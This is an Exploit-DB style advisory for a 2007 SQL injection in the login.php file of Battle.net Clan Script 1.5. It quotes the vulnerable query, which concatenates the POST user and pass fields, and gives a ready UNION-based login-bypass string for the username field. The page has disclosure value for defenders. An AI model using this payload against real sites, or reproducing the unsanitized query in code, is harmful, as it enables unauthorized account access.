Battle.net Clan Script 1.5 - SQL Injection

vendor:

Battle.net Clan Script

by:

h a c k e r _ X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Battle.net Clan Script

Affected Version From: Battle.net Clan Script 1.5

Affected Version To: Battle.net Clan Script 1.5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Battle.net Clan Script 1.5 – SQL Injection

The Battle.net Clan Script 1.5 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by manipulating the 'user' and 'pass' parameters in the login.php file.

Mitigation:

The vendor should implement proper input validation and parameterization techniques to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

****************************************

script : Battle.net Clan Script 1.5
file : login.php
attack : injection sql

auteur : h a c k e r _ X

***************************************

code :
------------------------------------------------------------------------------------------

line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];

.....
.....
.....

line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
*******

-------------------------------------------------------------------------------------------------


exploit :
*******

Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything





************************************************** *
thinks to : max007,simo64,brutalism and all marocains hackers

special thinks for "P Y N S S O"

************************************************** *

# milw0rm.com [2007-04-09]